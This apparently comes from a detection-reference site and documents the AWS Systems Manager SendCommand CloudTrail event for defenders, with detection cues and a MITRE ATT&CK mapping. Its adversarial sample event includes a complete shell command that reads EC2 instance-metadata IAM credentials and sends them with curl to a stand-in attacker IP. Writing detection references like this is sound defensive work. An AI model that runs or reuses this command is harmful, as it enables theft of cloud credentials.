Skip to content

SendCommand

AWS

SendCommand

service: AWS - SSM
techniques:

Event

Remotely executes a command or script on one or more managed instances via AWS Systems Manager Run Command.

Security Context

  • Remote command execution services provide adversaries with direct OS-level access to managed instances, often without requiring SSH or RDP.
  • Lateral movement techniques allow adversaries to expand their foothold by accessing additional systems and services within the environment.

Log Source

CloudTrail

Sample Event

Adversarial. Draco invokes the built-in AWS-RunShellScript SSM document on i-0occamy0000000001 to dump the instance metadata service v2 token + IAM role credentials and send them to 203.0.113.77 (his second-hop VPS). Detection cue: SendCommand against a production instance from a non-corporate IP, with DocumentName: "AWS-RunShellScript" and a Parameters.commands payload that touches 169.254.169.254. T1651 (cloud admin command) + T1059 (Linux shell).

{
"eventVersion": "1.09",
"userIdentity": {
"type": "IAMUser",
"principalId": "AIDADRAC0MALF0YBADGY",
"arn": "arn:aws:iam::555123456789:user/draco",
"accountId": "555123456789",
"accessKeyId": "AKIADRAC0MALF0YEXAMP5",
"userName": "draco",
"sessionContext": {
"attributes": {
"creationDate": "2026-04-15T18:51:02Z",
"mfaAuthenticated": "false"
}
}
},
"eventTime": "2026-04-15T20:14:06Z",
"eventSource": "ssm.amazonaws.com",
"eventName": "SendCommand",
"awsRegion": "us-east-1",
"sourceIPAddress": "203.0.113.66",
"userAgent": "aws-cli/1.18.147 Python/3.7.10 Linux/5.4.0-1045-aws botocore/1.18.6",
"requestParameters": {
"instanceIds": ["i-0occamy0000000001"],
"documentName": "AWS-RunShellScript",
"interactive": false,
"parameters": {
"commands": [
"TOKEN=$(curl -sX PUT -H 'X-aws-ec2-metadata-token-ttl-seconds: 21600' http://169.254.169.254/latest/api/token); ROLE=$(curl -sH \"X-aws-ec2-metadata-token: $TOKEN\" http://169.254.169.254/latest/meta-data/iam/security-credentials/); curl -sH \"X-aws-ec2-metadata-token: $TOKEN\" http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE | curl -s --data-binary @- http://203.0.113.77/c"
]
}
},
"responseElements": {
"command": {
"commandId": "90000000-0000-4000-8000-0001a0b0c0d0",
"documentName": "AWS-RunShellScript",
"status": "Pending",
"statusDetails": "Pending",
"instanceIds": ["i-0occamy0000000001"],
"requestedDateTime": "Apr 15, 2026 8:14:06 PM",
"comment": "",
"timeoutSeconds": 3600,
"parameters": {
"commands": ["[REDACTED IN RESPONSE — see requestParameters]"]
}
}
},
"requestID": "90000000-0000-4000-8000-000110100110",
"eventID": "90000000-0000-4000-8000-000110100111",
"readOnly": false,
"eventType": "AwsApiCall",
"managementEvent": true,
"recipientAccountId": "555123456789",
"eventCategory": "Management",
"tlsDetails": {
"tlsVersion": "TLSv1.3",
"cipherSuite": "TLS_AES_128_GCM_SHA256",
"clientProvidedHostHeader": "ssm.us-east-1.amazonaws.com"
}
}

MITRE ATT&CK Mapping

Tactics: Execution Lateral Movement

Techniques:
  • T1651 — Cloud Administration Command — Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents.
  • T1059 — Command and Scripting Interpreter — Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface a...